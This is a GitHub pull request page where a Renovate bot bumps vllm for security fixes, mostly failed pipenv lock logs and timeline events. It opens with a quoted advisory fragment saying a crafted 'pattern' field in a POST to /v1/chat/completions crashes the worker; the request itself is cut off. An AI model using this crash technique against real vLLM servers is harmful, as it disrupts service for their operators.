Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Ag

Copy link
Contributor Author

renovate bot commented May 31, 2025

⚠️ Artifact update problem

Renovate failed to update artifacts related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: model-servers/vllm/0.6.4/Pipfile.lock
Command failed: pipenv lock
Creating a virtualenv for this project
Pipfile: 
/tmp/renovate/repos/github/redhat-ai-dev/developer-images/model-servers/vllm/0.6
.4/Pipfile
Using /usr/local/bin/python33.11.13 to create virtualenv...
created virtual environment CPython3.11.13.final.0-64 in 514ms
  creator CPython3Posix(dest=/runner/cache/others/virtualenvs/0.6.4-d_r4MF2m, 
clear=False, no_vcs_ignore=False, global=False)
  seeder FromAppData(download=False, pip=bundle, setuptools=bundle, via=copy, 
app_data_dir=/tmp/containerbase/cache/.local/share/virtualenv)
    added seed packages: pip==25.2, setuptools==80.9.0
  activators 
BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator
,PythonActivator

✔ Successfully created virtual environment!
Virtualenv location: /runner/cache/others/virtualenvs/0.6.4-d_r4MF2m
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-eh6hls9k-requirements/pipenv-viassh6l-constraints.txt 
(line 20) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 451, in main
[ResolutionFailure]:       _main(
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 436, in _main
[ResolutionFailure]:       resolve_packages(
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 400, in resolve_packages
[ResolutionFailure]:       results, resolver = resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1083, in resolve_deps
[ResolutionFailure]:       results, hashes, internal_resolver = 
actually_resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^^^^^^^^^^
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 811, in actually_resolve_deps
[ResolutionFailure]:       resolver.resolve()
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 471, in resolve
[ResolutionFailure]:       raise ResolutionFailure(message=e)
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: ResolutionImpossible: for help visit 
https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-depende
ncy-conflicts

Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: Failed to lock Pipfile.lock!

File name: model-servers/vllm/0.6.6/Pipfile.lock
Command failed: pipenv lock
Creating a virtualenv for this project
Pipfile: 
/tmp/renovate/repos/github/redhat-ai-dev/developer-images/model-servers/vllm/0.6
.6/Pipfile
Using /usr/local/bin/python33.11.13 to create virtualenv...
created virtual environment CPython3.11.13.final.0-64 in 155ms
  creator CPython3Posix(dest=/runner/cache/others/virtualenvs/0.6.6-39QtryhM, 
clear=False, no_vcs_ignore=False, global=False)
  seeder FromAppData(download=False, pip=bundle, setuptools=bundle, via=copy, 
app_data_dir=/tmp/containerbase/cache/.local/share/virtualenv)
    added seed packages: pip==25.2, setuptools==80.9.0
  activators 
BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator
,PythonActivator

✔ Successfully created virtual environment!
Virtualenv location: /runner/cache/others/virtualenvs/0.6.6-39QtryhM
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-d72uranr-requirements/pipenv-v3ot_r5b-constraints.txt 
(line 10) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 451, in main
[ResolutionFailure]:       _main(
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 436, in _main
[ResolutionFailure]:       resolve_packages(
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 400, in resolve_packages
[ResolutionFailure]:       results, resolver = resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1083, in resolve_deps
[ResolutionFailure]:       results, hashes, internal_resolver = 
actually_resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^^^^^^^^^^
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 811, in actually_resolve_deps
[ResolutionFailure]:       resolver.resolve()
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 471, in resolve
[ResolutionFailure]:       raise ResolutionFailure(message=e)
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: ResolutionImpossible: for help visit 
https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-depende
ncy-conflicts

Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: Failed to lock Pipfile.lock!

File name: model-servers/vllm/0.8.4/Pipfile.lock
Command failed: pipenv lock
Creating a virtualenv for this project
Pipfile: 
/tmp/renovate/repos/github/redhat-ai-dev/developer-images/model-servers/vllm/0.8
.4/Pipfile
Using /usr/local/bin/python33.11.13 to create virtualenv...
created virtual environment CPython3.11.13.final.0-64 in 124ms
  creator CPython3Posix(dest=/runner/cache/others/virtualenvs/0.8.4-lR4GvG4y, 
clear=False, no_vcs_ignore=False, global=False)
  seeder FromAppData(download=False, pip=bundle, setuptools=bundle, via=copy, 
app_data_dir=/tmp/containerbase/cache/.local/share/virtualenv)
    added seed packages: pip==25.2, setuptools==80.9.0
  activators 
BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator
,PythonActivator

✔ Successfully created virtual environment!
Virtualenv location: /runner/cache/others/virtualenvs/0.8.4-lR4GvG4y
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-8q7leh9i-requirements/pipenv-kszlqkpf-constraints.txt 
(line 19) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 451, in main
[ResolutionFailure]:       _main(
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 436, in _main
[ResolutionFailure]:       resolve_packages(
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/resolver.py", line 400, in resolve_packages
[ResolutionFailure]:       results, resolver = resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1083, in resolve_deps
[ResolutionFailure]:       results, hashes, internal_resolver = 
actually_resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^^^^^^^^^^
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 811, in actually_resolve_deps
[ResolutionFailure]:       resolver.resolve()
[ResolutionFailure]:   File 
"/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 471, in resolve
[ResolutionFailure]:       raise ResolutionFailure(message=e)
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: ResolutionImpossible: for help visit 
https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-depende
ncy-conflicts

Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: Failed to lock Pipfile.lock!

@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from 4781d93 to a70fcd1 Compare August 11, 2025 07:27
@renovate renovate bot requested a review from a team as a code owner August 11, 2025 07:27
@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from a70fcd1 to 27c0fb1 Compare August 21, 2025 16:42
@renovate renovate bot changed the title Update dependency vllm to v0.9.0 [SECURITY] Update dependency vllm to v0.10.1.1 [SECURITY] Aug 21, 2025
@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from 27c0fb1 to bcb2a4f Compare September 25, 2025 21:28
Signed-off-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from bcb2a4f to fb53a3d Compare October 7, 2025 18:12
@renovate renovate bot changed the title Update dependency vllm to v0.10.1.1 [SECURITY] Update dependency vllm to v0.11.0 [SECURITY] Oct 7, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants